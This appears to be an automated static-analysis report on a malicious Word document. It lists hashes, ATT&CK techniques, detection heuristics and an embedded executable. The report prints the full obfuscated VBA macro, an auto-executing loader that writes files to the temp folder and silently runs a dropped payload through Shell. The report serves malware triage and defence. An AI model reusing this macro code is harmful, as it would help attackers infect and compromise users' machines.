Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 4bdf73472e7b662a…

MALICIOUS

Office (OLE)

204.0 KB Created: 2016-02-22 11:38:00 Authoring application: Microsoft Office Word First seen: 2019-01-25
MD5: 30698348a679f3e4393840e5328aa4e0 SHA-1: 9f6a79556423f6ae76410bfd38ed46225a58bafc SHA-256: 4bdf73472e7b662ab5e5f88ba45a0ab2402247cbaa08c0e6d38c7e5e627027b4
674 Risk Score

Malware Insights

MITRE ATT&CK
T1204.002 Malicious File T1059.005 Visual Basic T1105 Ingress Tool Transfer T1203 Exploitation for Client Execution

The sample is a malicious Microsoft Word document that leverages VBA macros to execute a dropped PE file. The VBA code contains obfuscated strings and calls to `CreateObject` and `Shell` functions, indicating an attempt to download and execute a second-stage payload. The embedded executable, `embedded_office_00006250.exe`, is detected by ClamAV as potentially malicious. The macro also attempts to establish persistence by writing to the registry key HKCU\Software\Microsoft\Windows\CurrentVersion\Run\IAccessible2Proxy.

Heuristics 18

  • CVE-2008-2244 — Microsoft Word record-parsing payload critical CVE likely CVE_2008_2244
    Word OLE document has normal small WordDocument/table streams, a large unallocated OLE slack region, and an executable or resolver shellcode payload in that slack. This is the static shape of the MS08-042 Word record-parsing exploit family tracked as CVE-2008-2244.
  • ClamAV: Doc.Macro.ObfuscatedChr-6203136-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Macro.ObfuscatedChr-6203136-0
  • Embedded PE executable critical OLE_EMBEDDED_EXE
    MZ/PE header found inside document — possible embedded executable
  • VBA macros detected medium 8 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    Dim ite As Variant
    ite = Shell(hfye, 0)
    End Function
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched line in script
    Set hfuBdgaVvw = CreateObject(FtqwVswq(23 + 64) & "ord.Application")
    hfuBdgaVvw.Visible = bhgw
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set hfuBdgaVvw = CreateObject(FtqwVswq(23 + 64) & "ord.Application")
    hfuBdgaVvw.Visible = bhgw
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    End Sub
    Sub AutoOpen()
        VYUQWD = "wkjd qwjdhkqwhjkqwg"
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    End Function
    Sub Workbook_Open()
        Yhbbgdgyw
  • Auto_Open macro low OLE_VBA_AUTO
    Auto_Open macro
    Matched line in script
    End Function
    Sub Auto_Open()
        Yhbbgdgyw
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
    TYYYWE = "T" & TYYYWE + "P"
    LLKKMN = Environ(TYYYWE) + YGBASDW
    RTQCDW = FtqwVswq(41 + 5)
  • Reference to LoadLibrary API high SC_STR_LOADLIBRARY
    Reference to LoadLibrary API
  • Reference to GetProcAddress API high SC_STR_GETPROCADDRESS
    Reference to GetProcAddress API
  • OLE document has large unaccounted-for region high OLE_SLACK_ANOMALY
    OLE file is 208,898 bytes but its declared streams total only 42,881 bytes — 166,017 bytes (79%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
  • Suspicious extracted artifact high EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 2904 bytes
SHA-256: 683c9ced10529e8df240791cd93bd1a65a349df907fb0da247d839e372580d67
Detection
ClamAV: No threats found
Obfuscation or payload: likely
67 of 111 identifiers look randomly generated (e.g. 'kqwqwdqwdjkqlkqwd') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub Bgywqewq()
    Yhbbgdgyw
End Sub
Sub Yhbbgdgyw()
Dim fdaa As Integer
Dim bhgw As Boolean, FDFWQD As String
bhgw = False
DFWCQDW = DatePart("yyyy", "11/10/7134")
DFWCQDW = Left(DFWCQDW, 1)
TYYYWE = "EM"
fdaa = CInt(DFWCQDW) - 8
On Error Resume Next
YGBASDW = Left("\wjh83\", 1)
TYYYWE = "T" & TYYYWE + "P"
LLKKMN = Environ(TYYYWE) + YGBASDW
RTQCDW = FtqwVswq(41 + 5)
RREW = RTQCDW + FtqwVswq(6 + 96 + fdaa)
RREW = RREW & "x" + FtqwVswq(10 + 91)
UUIIW = RTQCDW & FtqwVswq(-6 + 120) & FtqwVswq(5 + 110 + 1) + "f"

BBBVQWGD = LLKKMN + "fuewq" + UUIIW
DDDHUQWD = LLKKMN + "fbywuq" + UUIIW
FDFWQD = LLKKMN + "idd2" & RREW

VgfdVsq (BBBVQWGD)
VgfdVsq (DDDHUQWD)
Module1.Findat (2)
QWJDQ = LLKKMN + "fuewq" & ".rtf"
HYUQWD = "lkf lwkejflkhqjkwdq"

Set hfuBdgaVvw = CreateObject(FtqwVswq(23 + 64) & "ord.Application")
hfuBdgaVvw.Visible = bhgw
JUHFEW = "kqwdjqwkqlkqwd"
JBDASDS = "kqwqwddjkqlkqwd"
LQKWDHAS = "kqwasddjkqlkqwd"
VBHMQWD = "kqwqwdjkqlkqwd"
BCHJASD = "kqwdjqwdkqlkqwd"
UQWDGJHSBD = "kqwdqwjkqlkqwd"
KASJDLQW = "kqwdjkasdqlkqwd"
BHQJSDQ = "kqwdjkasdqlkqwd"
JQIWDHUQW = "kqwdjqww2kqlkqwd"
hfuBdgaVvw.Documents.Open (QWJDQ)
CBHJQHDBA = "kqd3rwdjkqlkqwd"
JQWBDWQ = "kqwdjkqsadlkqwd"
QUHDQBW = "kqwdj32dsakqlkqwd"
QJWDBKQW = "kqwd3fjkqlkqwd"
QBHFJB = "kqwdjkql3d1kqwd"
NQHJWBQ = "kqwdjkqlasdakqwd"
QBHJWQD = "kqwdjkqlqwd12kqwd"
QBHDWJWQ = "kqwdjkqqwlkqwd"
BHQVJQW = "kqwdjkqlksadqwd"
Module1.Findat (2)
HYUASGD = Module1.Trwnw(FDFWQD)
Module1.Findat (3)
hfuBdgaVvw.Quit
Set hfuBdgaVvw = Nothing
End Sub
Public Function FtqwVswq(ande As Integer)
    FtqwVswq = Chr(ande)
End Function
Sub Workbook_Open()
    Yhbbgdgyw
End Sub
Sub AutoOpen()
    VYUQWD = "wkjd qwjdhkqwhjkqwg"
    Bgywqewq
End Sub
Public Function VgfdVsq(fndj As String)
BCJHMA = "kqwdjkqlkqwd"
VBJQK = "kqwdqwdjkqlkqwd"
QWIDHQ = "kqwqwdqwdjkqlkqwd"
    ActiveDocument.SaveAs FileName:=fndj, FileFormat:=wdFormatRTF
    JUHFEW = "kqwdjkqlkqwd"
QBHJSA = "kqwdasdqwjkqlkqwd"
QJNWKD = "kqwqwddjkqlkqwd"
QIWUHDUWQ = "kqwdjasdkqlkqwd"
CHJBQWD = "kqwdjqwdkqlkqwd"
JBNSADNMBSAN = "kqqwdqwwdjkqlkqwd"
JQHWDKJQW = "kqwdjasdqkqlkqwd"
JBAHJWQ = "kqwdqadsjkqlkqwd"
JQHWBDJQ = "kqwdjkqwdqwqlkqwd"
End Function
Sub Auto_Open()
    Yhbbgdgyw
End Sub










Attribute VB_Name = "Module1"
Sub Findat(Torj As Long)
Dim Yuuw As Long
Dim Rtes As Long
NQWJDSD = ";qkwldjq kl"
Rtes = Torj + Timer
Yuuw = Rtes
Do While Timer < Yuuw
DoEvents
Loop
End Sub
Public Function Trwnw(hfye As String)
Dim ite As Variant
ite = Shell(hfye, 0)
End Function
embedded_office_00006250.exe embedded-pe Office MZ+PE at offset 0x6250 183730 bytes
SHA-256: 54030c4bd897b550e71b3f7ac6c25aa5c6e4991597f2a20bb3b4b7ff4d148df5
Detection
ClamAV: BC.Win.Packer.Troll-14
Obfuscation or payload: likely
Carved macro source contains an auto-exec entry point and execution/download terms.